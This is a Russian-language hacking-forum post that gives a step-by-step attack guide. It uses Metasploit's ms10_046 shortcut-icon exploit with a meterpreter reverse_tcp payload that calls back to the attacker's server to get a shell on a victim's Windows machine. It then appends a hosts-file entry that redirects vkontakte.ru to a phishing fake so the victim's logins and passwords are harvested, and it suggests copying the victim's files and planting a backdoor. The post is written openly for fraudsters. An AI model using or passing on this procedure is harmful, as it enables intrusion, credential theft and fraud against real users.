ms10_046 или получаем доступ к "вконтакте" и не только

biozz

Убийца Нарушителей
Joined
Jan 18, 2015
Messages
599
Reaction score
410
Age
39
И так что нам потребуетсяMetasploit
Vds с прямым ip (дедик)
Фейк ресурса к которому будем получать доступ в данном случае "Вконтакте"

И так сразу к делу покупаем/ломаем/кардим деда win/nix* кому что по душеУстанавливаем apache+mysql+php/

В темпе делаем/скачиваем фейк ресурса к которому нам нужен доступ копируем все скрипты фейка в корень нашего сервака переходим по адресу наш.белый.ip.xx лицезреем свежеиспеченный фейк вконтакта, чекаем и приступаем к работе!

/etc/init.d/apache2 stop #Вырубаем апач

Скачиваем metasploit установка займет не более 10 минут.

[HIDE=10]> msfconsole
#запускаем metasploit

> search ms10_046
#ищем эксплоит

> use windows/browser/ms10_046_shortcut_icon_dllloader
#выбираем эксплоит

> show payloads
#смотрим список доступных начинок для нашего сплоита

> set payload windows/meterpreter/reverse_tcp
#привязывем начинку к сплоиту

>show options
#смотрим настройки

> set lhost наш.белый.ip.xx
#указываем ip к которому будет осущевствлен бекконект

> exploit
#запускаем сплоент

Все сплоит запустился и ждет жертву по адресу наш.белый.ip.xx/ololo/ на нашей тачке открылся 4444 порт в ожидании бекконекта.

Впариваем "шару" жертве не мне вас учить как это делать господа мошенники,как только жертва переходит на нашу "шару" сплоит начинает работать,срабатывает>получаем доступ к шеллу через начинку нашего сплоита.

Посмотреть список доступных команд мы можем командой help так с командами разобрались,наша цель получить логин:пароль конкретного ресурса,наш фейк находится по адресу наш.белый.ip.xx

Командуем в оболочку > shell и получаем полноценный доступ к консоли удаленной машины дальше подкоректируем хост файлик

> echo наш.белый.ip.xx vkontakte.ru >>C:\WINDOWS\system32\drivers\etc\hosts

Ну вот и все теперь не теряем времени ползаем по дискам жертвы качаем всякие вкусняшки к себе на ftp ,посмотри команды cmd винды если не знаеш как это делать ,конечно можно закрепится на удаленной машине закинув на нее бекдор с бекконектом все в твоих руках!Я лиш описываю примитивную пользу от данной уязвимости,заканчиваем свои дела закрываем сессию и метасплоит >exit >exit >exit

/etc/init.d/apache2 start #стартуем апач

Готово теперь как только жертва зайдет на vkontakte.ru её перенаправит на наш фейк, вряд ли жертва что-то заподозрит,
при авторизации логин и пасс сохраняется в скрипте нашего фейка далее её просто редиректит на адрес прописанный в скрипте фейка тут уж на ваше усмотрение.[/HIDE]
 
Top